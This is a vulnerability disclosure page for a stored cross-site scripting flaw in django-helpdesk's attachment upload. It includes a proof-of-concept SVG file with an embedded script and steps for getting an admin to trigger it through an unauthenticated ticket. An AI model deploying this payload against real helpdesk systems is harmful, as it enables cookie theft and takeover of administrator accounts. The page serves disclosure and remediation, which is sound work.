Lucene search

Noobpk4D7A5FDD-B2DE-467A-ADE0-3F2FB386638E

HistoryNov 11, 2021 - 2:18 p.m.

Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk

2021-11-1114:18:52

noobpk

www.huntr.dev

cross-site scripting

stored xss

upload

attachment

svg

html

django-helpdesk

unauthenticated user

admin

impact

cookie theft

EPSS

0.001

Percentile

21.4%

JSON

Description

Stored XSS via upload ‘Attachments’ with format .svg or .html

Detail

When opening the attachment, some format files will be rendered and loaded on the browser. So it allows executing arbitrary javascript code that was injected into attachment before.

Proof of Concept

// PoC.svg
&lt;?xml version="1.0" standalone="no"?&gt;
&lt;!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"&gt;

&lt;svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"&gt;
   &lt;rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /&gt;
   &lt;script type="text/javascript"&gt;
      alert("XSS");
   &lt;/script&gt;
&lt;/svg&gt;

Step top Reproduct

Create a ticket with an unauthenticated user

Upload .svg or .html into attachments

The XSS will trigger when the admin open the attachment

Impact

This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.

References

owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting

EPSS

0.001

Percentile

21.4%

JSON

Related for 4D7A5FDD-B2DE-467A-ADE0-3F2FB386638E